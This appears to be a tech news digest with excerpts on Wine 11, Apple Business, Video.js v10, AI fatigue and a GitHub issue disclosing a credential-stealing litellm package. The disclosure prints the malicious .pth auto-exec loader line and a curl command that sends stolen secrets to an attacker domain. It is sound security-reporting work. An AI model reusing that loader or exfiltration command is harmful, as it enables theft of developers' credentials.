10 interesting stories served every morning and every evening.




1 987 shares, 58 trendiness

Wine 11 rewrites how Linux runs Windows games at the kernel level, and the speed gains are massive

Linux gaming has come a long way. When Valve launched Proton back in 2018, it felt like a turning point, turning the Linux gaming experience from “technically possible if you’re okay with a lot of pain” to something that more or less worked. Since then, we’ve seen incremental Wine releases, each one chipping away at compatibility issues and improving performance bit by bit. Wine 10, Wine 9, and so on; each one a collection of bug fixes and small improvements that kept the ecosystem moving forward.

Wine 11 is different. This isn’t just another yearly release with a few hundred bug fixes and some compatibility tweaks. Beyond the usual huge pile of changes and fixes, it ships with NTSYNC support, a feature years in the making that rewrites how Wine handles one of the most performance-sensitive operations in modern gaming. On top of that, the WoW64 architecture overhaul is finally complete, the Wayland driver has grown up a lot, and there’s a big list of smaller improvements that collectively make this feel like an all-new project.

I should be clear: not every game is going to see a night-and-day difference. Some titles will run identically to before. But for the games that do benefit from these changes, the improvements range from noticeable to absurd. And because Proton, SteamOS, and every downstream project builds on top of Wine, those gains trickle down to everyone.

Everything up until now was a workaround

Esync and fsync worked, but they weren’t ideal

If you’ve spent any time tweaking Wine or Proton settings, you’ve probably encountered the terms “esync” and “fsync” before. Maybe you toggled them on in Lutris, or noticed them in Proton launch options, without fully understanding what they do. To understand why NTSYNC matters, you need to understand the problem these solutions were all trying to solve.

Windows games, especially modern ones, are heavily multi-threaded. Your CPU isn’t just running one thing at a time; it’s juggling rendering, physics calculations, asset streaming, audio processing, AI routines, and more, all in parallel across multiple threads. These threads need to coordinate with each other constantly. One thread might need to wait for another to finish loading a texture before it can render a frame. Another might need exclusive access to a shared resource so two threads don’t try to modify it simultaneously.

Windows handles this coordination through what are called NT synchronization primitives: mutexes, semaphores, events, and the like. They’re baked deep into the Windows kernel, and games rely on them heavily. The problem is that Linux doesn’t have native equivalents that behave exactly the same way. Wine has historically had to emulate these synchronization mechanisms, and the way it did so was, to put it simply, not ideal.
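To make the vocabulary concrete, here is a minimal sketch of the same three concepts using Python’s threading module. These are Linux-side analogues for illustration only, not Wine’s internals, and the loader/renderer names are invented:

```python
import threading

# Linux-side analogues (Python's threading module) of the NT primitives the
# article names; an illustration of the concepts only, not Wine's internals.
texture_loaded = threading.Event()      # ~ NT event: "texture is ready"
upload_slots = threading.Semaphore(2)   # ~ NT semaphore: bounded concurrency
scene_lock = threading.Lock()           # ~ NT mutex: exclusive access

results = []

def loader():
    with upload_slots:                  # take one of the limited slots
        results.append("texture decoded")
    texture_loaded.set()                # wake anyone waiting on the event

def renderer():
    texture_loaded.wait()               # block until the loader signals
    with scene_lock:                    # touch shared state exclusively
        results.append("frame rendered")

threads = [threading.Thread(target=renderer), threading.Thread(target=loader)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(results)
```

The renderer cannot append until the loader signals the event, so the order of `results` is deterministic even though the threads start in the opposite order.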

The original approach involved making a round-trip RPC call to a dedicated “kernel” process called wineserver every single time a game needed to synchronize between threads. For a game making thousands of these calls per second, that overhead added up fast and became a bottleneck, one that manifested as subtle frame stutters, inconsistent frame pacing, and games that just felt a little bit off even when the raw FPS numbers looked fine.
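A rough way to feel the cost of per-operation round trips: compare an uncontended in-process lock against a write-then-read round trip over a pipe. This is a crude same-process stand-in, not the actual wineserver protocol; real cross-process RPC adds scheduling and context switches on top of the syscall cost shown here:

```python
import os
import threading
import time

N = 20_000

# In-process synchronization: acquire/release an uncontended lock N times.
lock = threading.Lock()
t0 = time.perf_counter()
for _ in range(N):
    lock.acquire()
    lock.release()
in_process = time.perf_counter() - t0

# Crude stand-in for a wineserver-style round trip: send a one-byte request
# and read a one-byte reply through a pipe (two syscalls per operation).
rfd, wfd = os.pipe()
t0 = time.perf_counter()
for _ in range(N):
    os.write(wfd, b"x")
    os.read(rfd, 1)
round_trip = time.perf_counter() - t0
os.close(rfd)
os.close(wfd)

print(f"{N} lock ops: {in_process:.4f}s   {N} pipe round trips: {round_trip:.4f}s")
```

Even this understated version of the round trip is markedly slower per operation than staying in-process, which is the gap esync, fsync, and ultimately NTSYNC set out to close.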

Esync was the first attempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd system call to handle synchronization without bouncing through the wineserver. It worked, and it helped, but it had quirks. Some distros ran into issues with file descriptor limits, since every synchronization object needed its own file descriptor, and games that opened a lot of them could hit the system’s ceiling quite quickly.

Fsync came next, using Linux futexes for even better performance. It was faster than esync in most cases, but it required out-of-tree kernel patches that never made it into the mainline Linux kernel or upstream Wine out of the box. That meant you needed a custom or patched kernel to use it, which is fine for enthusiasts running CachyOS or Proton-GE, but not exactly accessible for the average user on Ubuntu or Fedora. Futex2, often referred to interchangeably with fsync, did land in Linux kernel 5.16 as futex_waitv, but that isn’t the original implementation: the original fsync used futex_wait_multiple, while futex2 uses futex_waitv. Applications such as Lutris still refer to it as fsync, though. It’s still fsync in spirit, but it’s not the original fsync.

Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonetheless. They approximated NT synchronization behavior using Linux primitives that weren’t designed for the job, and certain edge cases simply couldn’t be handled correctly. Operations like NtPulseEvent() and the “wait-for-all” mode in NtWaitForMultipleObjects() require direct control over the underlying wait queues in ways that user-space implementations just can’t reliably provide.
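To see why user space struggles, here is a sketch of the obvious “wait-for-all” loop. For plain events it happens to work, but as the docstring notes, it cannot provide the atomic all-or-nothing acquisition that NT guarantees for mutexes:

```python
import threading

def naive_wait_for_all(events, timeout=5.0):
    """User-space approximation of NtWaitForMultipleObjects(bWaitAll=True).

    Waiting on each object in turn is fine for events (they stay signalled),
    but for mutexes NT must acquire ALL objects atomically or none at all.
    A one-at-a-time loop can't do that: thread A grabs object 1 while thread
    B holds object 2, and both then wait on each other forever.
    """
    for e in events:
        if not e.wait(timeout):
            return False
    return True

evts = [threading.Event() for _ in range(3)]

def signaller():
    for e in reversed(evts):    # signal out of order relative to the waiter
        e.set()

threading.Thread(target=signaller).start()
ok = naive_wait_for_all(evts)
print("all signalled:", ok)
```

The kernel, by contrast, can lock all the relevant wait queues at once, which is exactly the capability NTSYNC brings.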

Synchronization at the kernel level, rather than in user space

NTSYNC takes a completely different approach. Instead of trying to shoehorn Windows synchronization behavior into existing Linux primitives, it adds a new kernel driver that directly models the Windows NT synchronization object API. It exposes a /dev/ntsync device that Wine can talk to, and the kernel itself handles the coordination. No more round trips to wineserver, no more approximations: the synchronization happens in the kernel, which is where it should be, with proper queue management, proper event semantics, and proper atomic operations.
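Assuming a kernel with the driver built and loaded, the device node is easy to probe for; `ntsync_available` is a hypothetical helper name, not part of Wine:

```python
import os

def ntsync_available(dev="/dev/ntsync"):
    """Return True if the NTSYNC character device is present.

    The device only appears when the ntsync kernel module is loaded
    (mainline since Linux 6.14); some distros don't load it by default,
    in which case `modprobe ntsync` is needed first.
    """
    return os.path.exists(dev)

print("NTSYNC device present:", ntsync_available())
```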

What makes this even better is that NTSYNC was developed by the same person who created esync and fsync in the first place. Elizabeth Figura has been working on this problem for years, iterating through multiple kernel patch revisions, presenting the work at the Linux Plumbers Conference in 2023, and pushing through multiple versions of the patch set before it was finally merged into the mainline Linux kernel with version 6.14.

The numbers are wild. In developer benchmarks, Dirt 3 went from 110.6 FPS to 860.7 FPS, an impressive 678% improvement. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. And Call of Duty: Black Ops I is now actually playable on Linux. Those benchmarks compare Wine NTSYNC against upstream vanilla Wine, which means there’s no fsync or esync either. Gamers who use fsync are not going to see such a leap in performance in most games.
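The percentages quoted are plain relative gains, i.e. (after / before − 1) × 100; a quick check of the quoted figures:

```python
def pct_gain(before, after):
    """Relative improvement in percent: (after / before - 1) * 100."""
    return (after / before - 1) * 100

# FPS figures as quoted in the article.
for title, before, after in [
    ("Dirt 3", 110.6, 860.7),
    ("Resident Evil 2", 26, 77),
    ("Call of Juarez", 99.8, 224.1),
    ("Tiny Tina's Wonderlands", 130, 360),
]:
    print(f"{title}: {before} -> {after} FPS (+{pct_gain(before, after):.0f}%)")
```

Dirt 3’s 110.6 → 860.7 FPS works out to +678%, matching the figure in the text; the other titles land between roughly +125% and +196%.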

The games that benefit most from NTSYNC are the ones that were struggling before, such as titles with heavy multi-threaded workloads where the synchronization overhead was a genuine bottleneck. For those games, the difference is night and day. And unlike fsync, NTSYNC is in the mainline kernel, meaning you don’t need any custom patches or out-of-tree modules for it to work. Any distro shipping kernel 6.14 or later, which at this point includes Fedora 42, Ubuntu 25.04, and more recent releases, will support it. Valve has already added the NTSYNC kernel driver to SteamOS 3.7.20 beta, loading the module by default, and an unofficial Proton fork, Proton GE, already has it enabled. When Valve’s official Proton rebases on Wine 11, every Steam Deck owner gets this for free.
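If you want to check your own machine, comparing the running kernel’s major.minor version against 6.14 is enough; `kernel_supports_ntsync` is a hypothetical helper:

```python
import platform

def kernel_supports_ntsync(release=None):
    """True if the kernel release string is >= 6.14 (mainline NTSYNC merge).

    Only the major.minor components are compared; suffixes like
    "-generic" or "-arch1" are ignored.
    """
    release = release or platform.release()   # e.g. "6.14.0-25-generic"
    major, minor = release.split(".")[:2]
    minor = minor.split("-")[0]               # strip any "-suffix"
    return (int(major), int(minor)) >= (6, 14)

print(platform.release(), "->", kernel_supports_ntsync())
```

Note that a new-enough kernel is necessary but not sufficient: the ntsync module still has to be loaded, as in the device check above all distros may not do by default.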

All of this is what makes NTSYNC such a big deal, as it’s not simply a run-of-the-mill performance patch. Instead, it’s something much bigger: this is the first time Wine’s synchronization has been correct at the kernel level, implemented in the mainline Linux kernel, and available to everyone without jumping through hoops.

If NTSYNC is the headline feature, the completion of Wine’s WoW64 architecture is the change that will quietly improve everyone’s life going forward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the subsystem that lets 32-bit applications run on 64-bit systems. Wine has been working toward its own implementation of this for years, and Wine 11 marks the point where it’s officially done.

What this means in practice is that you no longer need 32-bit system libraries installed on your 64-bit Linux system to run 32-bit Windows applications. Wine handles the translation internally, using a single unified binary that automatically detects whether it’s dealing with a 32-bit or 64-bit executable. The old days of installing multilib packages, configuring ia32-libs, or fighting with 32-bit dependencies on your 64-bit distro are thankfully over.

This might sound like a small quality-of-life improvement, but it’s a massive piece of engineering work. The WoW64 mode now handles OpenGL memory mappings, SCSI pass-through, and even 16-bit application support. Yes, 16-bit! If you’ve got ancient Windows software from the 90s that you need to run for whatever reason, Wine 11 has you covered.

For gaming specifically, this matters because a surprising number of games, especially older ones, are 32-bit executables. Previously, getting these to work often meant wrestling with your distro’s multilib setup, which varied in quality and ease depending on whether you were on Ubuntu, Arch, Fedora, or something else entirely. Now, Wine just handles it for you.

The rest of Wine 11 isn’t just filler

There are more fixes, too

It’s easy to let NTSYNC and WoW64 steal the spotlight, but Wine 11 is packed to the gills with other stuff worth talking about.

The Wayland driver has come a long way. Clipboard support now works bidirectionally between Wine and native Wayland applications, which is one of those things you don’t think about until it doesn’t work and it drives you mad. Drag-and-drop from Wayland apps into Wine windows is supported. Display mode changes are now emulated through compositor scaling, which means older games that try to switch to lower resolutions like 640x480 actually behave properly instead of leaving you with a broken desktop. If you’ve been holding off on switching from X11 to Wayland because of Wine compatibility concerns, Wine 11 removes a lot of those barriers.

On the graphics front, EGL is now the default backend for OpenGL rendering on X11, replacing the older GLX path. Vulkan support has been bumped to API version 1.4, and there’s initial support for hardware-accelerated H.264 decoding through Direct3D 11 video APIs using Vulkan Video. That last one is particularly interesting for games and applications that use video playback for things like cutscenes or in-game streaming.

Force feedback support has been improved for racing wheels and flight sticks, which is great news if you’re running a sim setup on Linux. Bluetooth has also received a new driver with BLE services and proper pairing support, MIDI soundfont handling has been improved for legacy game music, and there are a couple of minor extras like Zip64 compression support, Unicode 17.0.0 support, TWAIN 2.0 scanning for 64-bit apps, and IPv6 ping functionality.

Thread priority management has been improved on both Linux and macOS, which helps with multi-threaded application performance beyond just the NTSYNC gains. ARM64 devices can now simulate 4K page sizes on systems with larger native pages, which keeps the door open for Wine on Arm hardware. And with more Arm-based Linux devices showing up every year, that matters more than it used to.

Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all received specific compatibility fixes, on top of the broader improvements made across the board that will lift performance and compatibility across significantly more titles.

Wine 11 is a big release, and it’s not just NTSYNC that makes it one. Sure, NTSYNC alone would have made it worth paying attention to, but combined with the WoW64 completion, the Wayland improvements, and the sheer volume of fixes, it’s the most important Wine release since Proton made Linux gaming viable. Everything built on top of Wine, from Proton to Lutris to Bottles, gets better because of it. If you play games on Linux at all, Wine 11 is worth taking the time to try out.

...

Read the original on www.xda-developers.com »

2 713 shares, 26 trendiness

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer · Issue #24512 · BerriAI/litellm

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.

This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:

pip download litellm==1.82.8 --no-deps -d /tmp/check

python3 - <<'EOF'
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
EOF

You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('…'))"])
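The '…' above is the elided blob. To see how such double encoding behaves, and why a plaintext grep finds nothing, here is the same structure with a harmless stand-in payload (when analyzing a real sample, decode and print, never exec):

```python
import base64

# Benign stand-in for the attacker's doubly-encoded payload.
inner_script = "print('hello from stage 2')"
stage1 = base64.b64encode(inner_script.encode())  # first base64 layer
stage2 = base64.b64encode(stage1)                 # second layer: "double" encoding

# What exec(base64.b64decode('...')) receives is itself another base64 blob,
# so grepping either layer for plaintext strings turns up nothing.
print("on the wire:", stage2[:40])

# Analysis side: peel both layers off and PRINT the result. Never exec() it.
recovered = base64.b64decode(base64.b64decode(stage2)).decode()
print("recovered:", recovered)
```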

The payload is double base64-encoded. When decoded, it performs the following:

The script collects sensitive data from the host system:

* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

* The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2.

* The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep.

* Both encrypted files are packed into tpcp.tar.gz.

The archive is exfiltrated via:

curl -s -o /dev/null -X POST \
  https://models.litellm.cloud/ \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
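You can demonstrate this trigger safely: site.addsitedir() runs the same .pth processing that happens at interpreter startup, and any line beginning with "import" is executed. The file name and environment variable here are invented for the demo:

```python
import os
import site
import tempfile

# Any .pth line that begins with "import" is exec()'d by the site module.
# site.addsitedir() runs the same processing applied to site-packages/ at
# interpreter startup; demonstrated here with a harmless side effect.
os.environ.pop("PTH_DEMO_RAN", None)

with tempfile.TemporaryDirectory() as d:
    with open(os.path.join(d, "demo_init.pth"), "w") as f:
        f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")
    site.addsitedir(d)                  # executes the import line above
    print("pth executed:", os.environ.get("PTH_DEMO_RAN"))
```

This is exactly why a malicious .pth is so dangerous: running any Python process on the machine, for any purpose, detonates the payload.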

* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.

* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

* Other versions: Not yet checked — the attacker may have compromised multiple releases

* Users: Check for litellm_init.pth in your site-packages/ directory.

* Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed.
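The site-packages check above is easy to script; `find_suspicious_pth` is a hypothetical helper that looks in every site-packages location this interpreter knows about:

```python
import os
import site

def find_suspicious_pth(name="litellm_init.pth"):
    """Return paths of the named .pth file found in any site-packages dir.

    Checks both the system site-packages directories and the per-user
    directory; an empty list means these install locations are clean.
    """
    dirs = list(site.getsitepackages()) + [site.getusersitepackages()]
    return [os.path.join(d, name)
            for d in dirs
            if os.path.isfile(os.path.join(d, name))]

hits = find_suspicious_pth()
print("infected:", hits if hits else "no litellm_init.pth found")
```

Run it once per interpreter and virtual environment on the machine, since each has its own site-packages.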

...

Read the original on github.com »

3 654 shares, 33 trendiness

Is anybody else bored of talking about AI?

At serious risk of sounding like a heretic here: I’m kinda bored of talking about AI.

I get it, AI is incredible. I use it every day, it’s completely changed my workflow. I recently started a new role in a tricky domain working at web scale (hey, remember web scale?) and it’s allowed me to go from 0-1 in terms of productivity in a matter of weeks.

With that being said, it’s all starting to feel a bit… routine. I’m not here to argue that the pace of change hasn’t been incredible, but on a day-to-day basis I’ve sorta run out of things to talk about. What makes this worse is it’s completely taken over mindshare across my section of the internet.

Hacker News, my favourite haunt, used to be full of interesting projects and problems being solved, but this seems to have devolved into three different people’s (almost identical) Claude Code workflows and yet another post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… configure AI tooling. This all feels a little self-fulfilling.

Kagi small web

is another great example of this effect. Here’s a challenge: open it up and press the ‘next’ button 20 times. What percentage of posts are AI related?

Before you write me off as ‘old man yells at cloud’, understand where I’m coming from. In the good old days (2023), before we called anybody who could open a Claude Code terminal an ‘AI engineer’, being a ‘Product Engineer’ was the hot new term. The idea was that engineers should move away from obsessing over code to obsessing over the product value they were delivering. I loved this, it made loads of sense to me, but we seem to have regressed. It’s no longer the code we’re obsessing over, it’s the overgrown auto-complete we’ve developed to make the easiest part of being an engineer easier.

It’s like if I went onto the woodworking subreddit and they’d all stopped showing pictures of the tables they’d created and just started posting about the hammer they were using. But they were all using basically the same hammer in the same way, so they were just screaming the same shit at each other at the top of their voices.

What makes this worse is that our bosses have bought into it this time too. My managers never cared much about database technologies, IDEs or javascript frameworks; they just wanted the feature so they could sell it. Management seems to have stepped firmly and somewhat haphazardly into the implementation detail now. I reckon most of us have got some sort of company initiative to use more AI in our objectives this year. Management’s involvement in the SDLC has always been a thing, DORA metrics have been around for a while. But historically, it’s always been about the outputs. Faster deploys, time to respond. Now we’re measuring the number of tokens used per-dev, which is no more useful than lines of code ever was.

I guess what I’m saying, other than just having a general whinge, is tell me more about the cool shit you’re building rather than the tools you’re using to build it. And don’t forget that the whole purpose of coding, like any other craft, is to create something that delivers value for someone. Even if that someone is just yourself.

… And yes, I’m painfully aware of the irony of a post moaning about posts about AI. Sorry.

...

Read the original on blog.jakesaunders.dev »

4 644 shares, 30 trendiness

Introducing Apple Business — a new all-in-one platform for businesses of all sizes

Introducing Apple Business — a new all-in-one platform for businesses of all sizes

Apple Business combines built-in mobile device management, business email and calendar services with custom domain support, and a powerful new option to reach local customers

Apple today announced Apple Business, a new all-in-one platform that includes key services companies need to effortlessly manage devices, reach more customers, equip team members with essential apps and tools, and get support from experts to run and grow efficiently and securely. Apple Business features built-in mobile device management, helping businesses easily configure employee groups, device settings, security, and apps with Blueprints to quickly get started. In addition, customers can now set up business email, calendar, and directory services with their own domain name for seamless and elevated communication and collaboration. And Apple Business can help millions of companies grow their reach and connect with local customers across Apple Maps, Mail, Wallet, Siri, and more, including a new option coming this summer that will enable businesses in the U.S. and Canada to place local ads in Maps during key search and discovery moments. Apple Business will be available starting Tuesday, April 14, in more than 200 countries and regions.1

“Apple Business is a significant leap forward in our decades-long commitment to helping companies of all sizes leverage the power of Apple products and services to run and grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “We’ve unified Apple’s strongest business offerings into one simple, secure platform, delivering key features for organizations in every stage and sector, including built-in device management, collaboration tools, and additional ways to reach new customers. We can’t wait to see how Apple Business helps companies spend more time focusing on what they love and connecting deeply with their communities.”

Apple Business offers built-in mobile device management (MDM), facilitating a comprehensive view of an organization’s Apple devices, settings, and more from a single interface. Previously available as a subscription within Apple Business Essentials in the U.S., Apple Business is designed to make IT easy — including for small businesses without dedicated IT resources. Apple Business includes new Blueprints to easily set up devices with preconfigured settings and apps, ensuring consistency and security and enabling zero-touch deployment for employees, so that new Apple products are ready to go out of the box.2

Apple Business includes options to purchase upgraded iCloud storage and support with AppleCare+ for Business, and a companion Apple Business app will allow employees to install apps for work, view colleague contact information, and request support while on the go.3

Apple Business expands the availability of Apple Business Manager to more than 200 countries and regions, and supports additional device management features, including:

* Managed Apple Accounts: Company data remains secure while employee data remains private, with cryptographic separation of work and personal data on devices. Apple Business enables automated Managed Apple Account creation for new employees through integration with an identity service provider, including Google Workspace, Microsoft Entra ID, and more.

* Employee management: Create user groups by function or team to assign apps and roles. Organizations can also create custom roles to manage access exactly the way they want.

* App distribution: Easily acquire and distribute apps to employees and teams through the App Store.

* Admin API: Simplify large deployments with API access to device, user, audit, and MDM service data.

New Ways to Manage Productivity and Collaboration

Apple Business introduces fully integrated email, calendar, and directory services that are designed to make it seamless to start a new business with a professional identity. Businesses can bring their own custom domain name or purchase a new one through Apple Business, helping founders elevate communication and collaboration. These services streamline operations, with scheduling tools like calendar delegation and a built-in company directory to make it easy for employees to connect with user groups and personalized contact cards.

Every day, users choose Apple Maps to discover and explore places and businesses around them. Beginning this summer in the U.S. and Canada, businesses will have a new way to be discovered by using Apple Business to create ads on Maps. Ads on Maps will appear when users search in Maps, and can appear at the top of a user’s search results based on relevance, as well as at the top of a new Suggested Places experience in Maps, which will display recommendations based on what’s trending nearby, the user’s recent searches, and more. Ads will be clearly marked to ensure transparency for Maps users.

Ads on Maps builds on Apple’s broader privacy-first approach to advertising, and maintains the same privacy protections Maps users enjoy today. A user’s location and the ads they see and interact with in Maps are not associated with a user’s Apple Account. Personal data stays on a user’s device, is not collected or stored by Apple, and is not shared with third parties. When Apple Business is available in April, businesses will need to first claim their location on Maps. Once ads on Maps is available, businesses will be able to access a fully automated experience of creating ads through Apple Business in a few simple steps. Current Apple Ads advertisers and agencies will also have the option to book ads through their existing Apple Ads experience, which will offer additional customization options for their ad campaigns.

Brand and Location Features in One Convenient Place

Brand management tools previously available in Apple Business Connect will now be available through Apple Business, making it easier than ever for businesses to set up and manage how their brand and locations appear across Apple services and apps.

* Brand profiles: Manage brand name, logo, and key details consistently across Apple Maps, Wallet, and other features and apps.

* Rich place cards: Customize with photos, detailed location information, hours, and other useful details that display across Apple Maps, Safari, Spotlight, and more.

* Showcases and custom actions: Highlight deals, special offers, new products, or seasonal items on place cards in Maps. Add custom actions like order or reserve to direct customers to a preferred website or app.

* Location insights: Gain valuable insights into how customers discover and interact with businesses on Maps, including search, views, and taps on actions.

* Branded communications: Display branding prominently in the Mail app and on iCloud Mail to increase awareness. Branding will display with tracked orders in Wallet for a more recognizable customer experience.

* Tap to Pay on iPhone: Build trust by displaying a brand logo and name on the payment screen when accepting payments directly on iPhone.

* Starting April 14, Apple Business will be available as a free service in the U.S. and 200+ countries and regions to new and existing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more information, visit business.apple.com/preview.

* Ads on Apple Maps will be available to businesses starting this summer in the U.S. and Canada. For more information, visit ads.apple.com/maps.

* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be available once Apple Business launches. Business Essentials customers will no longer be charged their monthly service fee for device management after April 14. Existing Business Connect data — including claimed locations, place card information, photos, organization information, account details, and more — will automatically migrate to Apple Business at launch.

* The Apple Business companion app, along with email, calendar, and directory features, will require iOS 26, iPadOS 26, or macOS 26.

* Customers in the U.S. can purchase additional iCloud storage up to 2TB per user, starting at $0.99 per user per month. AppleCare+ for Business coverage is available per device or per user, starting at $6.99 per month, or $13.99 per month per user for up to three devices.

Apple Business is available globally; certain features may be available in select countries and regions. See business.apple.com/preview for more details.

Zero-touch deployment is available when devices are purchased through Apple or Apple Authorized Resellers.

Additional iCloud storage and AppleCare+ for Business are available as additional paid offerings.

...

Read the original on www.apple.com »

5 490 shares, 12 trendiness

Oil traders bet millions ahead of Trump's Iran talks post

“We are surveilling markets and our approach to market abuse will be to look at the evidence in front of us. I can’t speak for what our US colleagues are doing,” he said.

...

Read the original on www.bbc.com »

6 434 shares, 30 trendiness

Video.js v10 Beta: Hello, World (again)

Today we’re excited to release the Video.js v10.0.0 beta. It’s the result of a rather large ground-up rewrite, not just of Video.js (discussion) but also of Plyr, Vidstack, and Media Chrome, through a rare teaming-up of open source projects and people who care a lot about web video, with a combined 75,000 github stars and tens of billions of video plays monthly.

I built Video.js 16 years ago to help the transition from Flash to HTML5 video. It’s grown a lot since then with the help of many people, but the codebase and APIs have continued to reflect a different era of web development. This rebuild modernizes the player both for how developers build today and sets up the foundation for the next significant transition to AI-augmented features and development.

* Shrinking bundle sizes, and then shrinking them more (88% reduction in default bundle size)

* Allowing deep customization using the familiar development patterns of your chosen framework — including new first-class React, Typescript, and Tailwind support

* Making the defaults look beautiful and perform beautifully (The experts are calling me saying “Sir, how did you make it so great?”. It’s incredible, really.)

* Designing the codebase and docs so AI agents building your player alongside you can actually be good at it

We’re pretty sure it works differently from what you’ve come to expect of a web media player, while we hope it feels more familiar to how you actually build.

One of the biggest complaints about video players today is their file size, often weighing in around 1MB minified and hundreds of KB gzipped. Players are sneakily-complex applications so there’s only so many bytes you can shave off, but legacy players were built in times before smart bundlers, tree shaking, and other size-saving opportunities. They carry with them many features you may not be actively using.

The Video.js v10 default player is now 88% smaller than the previous version’s (v8.x.x) default. A good chunk of those savings comes from the decision to unbundle adaptive bitrate (ABR) support, which you could remove in the previous version by instead importing from video.js/core, but the majority of video.js installs just use the default bundle while also not using the adaptive streaming features. Comparing more similar apples, with ABR removed, the v10 default video player (HTML) is still 66% smaller than the previous version, getting even smaller from there depending on which bundle you need.

While the pre­vi­ous sec­tion was com­par­ing play­ers with­out ABR, a lot of the weight of a fully-fea­tured video player comes from the stream­ing en­gine which is needed to han­dle adap­tive bi­trate (ABR) for­mats like HLS and DASH — for man­i­fest pars­ing, seg­ment load­ing, buffer man­age­ment, ABR logic, codec de­tec­tion, MSE in­te­gra­tion, DRM, server-side ads, and more. Similar to play­ers, tra­di­tional stream­ing en­gines have mono­lithic ar­chi­tec­tures mak­ing it dif­fi­cult to get the bun­dle size smaller.

As part of v10 we’ve started a new en­gine pro­ject called SPF 😎 (Streaming Processor Framework), which is a frame­work built around func­tional com­po­nents that are com­posed into pur­pose-built, smaller stream­ing en­gines. For ex­am­ple if you have a short-form video app with sim­ple adap­tive stream­ing needs, your en­gine won’t ship with any code for DRM and ads.
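
The composition idea can be sketched in a few lines of plain JavaScript. Everything below — the component names (`parseManifest`, `selectRendition`) and the context shape — is invented for illustration; the post doesn’t show SPF’s real API.

```javascript
// Each "component" is a plain function over an engine context object.
const parseManifest = (ctx) => ({
  ...ctx,
  renditions: ctx.manifest.renditions, // e.g. parsed from an HLS playlist
});

const selectRendition = (ctx) => ({
  ...ctx,
  // Pick the highest bitrate that fits the measured bandwidth.
  selected: ctx.renditions
    .filter((r) => r.bitrate <= ctx.bandwidth)
    .sort((a, b) => b.bitrate - a.bitrate)[0] ?? ctx.renditions[0],
});

// An engine is just the composition of the components you need. A build
// with no DRM or ads never references those functions, so a bundler can
// drop that code entirely.
const composeEngine = (...components) => (ctx) =>
  components.reduce((acc, step) => step(acc), ctx);

const simpleHlsEngine = composeEngine(parseManifest, selectRendition);

const result = simpleHlsEngine({
  manifest: { renditions: [{ bitrate: 800_000 }, { bitrate: 3_000_000 }] },
  bandwidth: 1_000_000,
});
// result.selected.bitrate === 800000
```

The point isn’t the rendition logic itself; it’s that DRM, ads, or codec probing would just be more functions in (or absent from) the `composeEngine` call.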

For a sim­ple HLS use case, Video.js v10 us­ing SPF is only 19% the file size of Video.js v8 in­clud­ing adap­tive bi­trate stream­ing (ABR).
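
Because those three claims use different baselines, it helps to put illustrative numbers on them. The absolute sizes below are assumptions (the post states only percentages); only the ratios come from the text.

```javascript
// Assumed v8 baseline sizes in KB gzipped; purely illustrative.
const v8Default = 300; // default bundle including ABR
const v8NoAbr = 150;   // comparable build with ABR removed

// "88% smaller" means the v10 default is 12% of the v8 default.
const v10Default = v8Default * (1 - 0.88); // ≈ 36 KB

// With ABR stripped from both, v10 is "66% smaller" than v8's
// comparable build. Note the baseline changes for this comparison.
const v10NoAbr = v8NoAbr * (1 - 0.66); // ≈ 51 KB

// "19% the file size" is a ratio, not a reduction: v10 + SPF for simple
// HLS is 0.19 x the v8-with-ABR figure (so it can exceed v10Default,
// since v10Default excludes ABR while this build includes it).
const v10WithSpf = v8Default * 0.19; // ≈ 57 KB
```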

Comparing en­gines to en­gines you get a clearer pic­ture of the story. The other en­gines are very dif­fi­cult to get any smaller with­out fork­ing them, while the en­gine com­posed us­ing SPF only in­cludes what’s needed for sim­ple adap­tive stream­ing us­ing HLS, mak­ing it only 12% the file size of even HLS.js-light .

To be clear, the im­me­di­ate goal is­n’t for SPF to re­place the full-fea­tured en­gines like HLS.js for ad­vanced stream­ing use cases, and in fact v10 works with all these stream­ing en­gines to­day. The goal is to achieve much smaller file sizes for com­mon, sim­pler use cases. At the same time we think a lot more sites and apps could ben­e­fit from sim­ple ABR, and we want SPF to lower the file size cost of us­ing it.

With v10 the file size story does­n’t ac­tu­ally start with the base­line builds. The li­brary is built for com­pos­ing a player with only what’s needed, al­low­ing for sim­ple use cases to be even smaller.

For ex­am­ple here’s a sim­ple React hello world” with just a video and play but­ton, weigh­ing in at gzipped .

